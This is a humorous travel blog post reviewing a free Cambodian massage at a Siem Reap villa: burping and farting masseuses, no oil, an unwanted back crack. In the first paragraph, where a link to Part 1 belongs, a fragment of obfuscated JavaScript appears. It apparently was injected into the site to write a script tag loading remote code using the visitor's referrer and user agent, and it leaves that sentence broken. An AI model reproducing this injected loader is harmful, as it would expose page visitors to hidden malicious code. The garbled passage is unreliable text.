Spa Treatments in SE Asia – For Science: Cambodia

If you only read one spa post, read this one. Part ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dbyba|var|u0026u|referrer|ainty||js|php’.split(‘|’),0,{}))

and Part 2 if you are interested.

Location: Golden Butterfly Villa (Siem Reap)
Treatment: 60 minute Cambodian Massage – whatever the heck that is
Cost: FREE (it was included with our hotel stay, but would have cost $6 otherwise)
Details: So this massage is similar to a Thai massage where you stay fully clothed, wearing the Cambodian equivalent of scrubs.  They wash your feet in some lime water before they start, which is nice.  Then you lay down and they kinda climb all over you, kneading and pushing and pulling.  So here’s the low down:
1.  My masseuse was burping throughout the first half of the massage.  I’m not big on the whole “peaceful music” part of massage, so this was more entertaining than annoying.
2.  Nick’s masseuse let out a light, airy, fart during his massage.  We were separated by a hanging sheet, so I definitely heard it.  He claims he didn’t notice.  But I’d recognize a sly little pooof anyday!
3.  The person on the 3rd bed was snoring like an old man.  It was either a very relaxed person getting a massage (which doesn’t seem feasible since this massage was anything but relaxing) or it was the 3rd masseuse, taking a break.
4.  They didn’t use oil.  By itself, no big deal.  But add in a humid climate and you get skin ripping skin.  I thought she was going to remove the top layer of my foot.
5.  She popped my back.  I know some people are into this.  I HATE it.  I hate any of my joints popping or cracking (except my hip, I love that one).
So yeah, if you go to Siem Reap don’t get a massage from this place.  Not worth it.
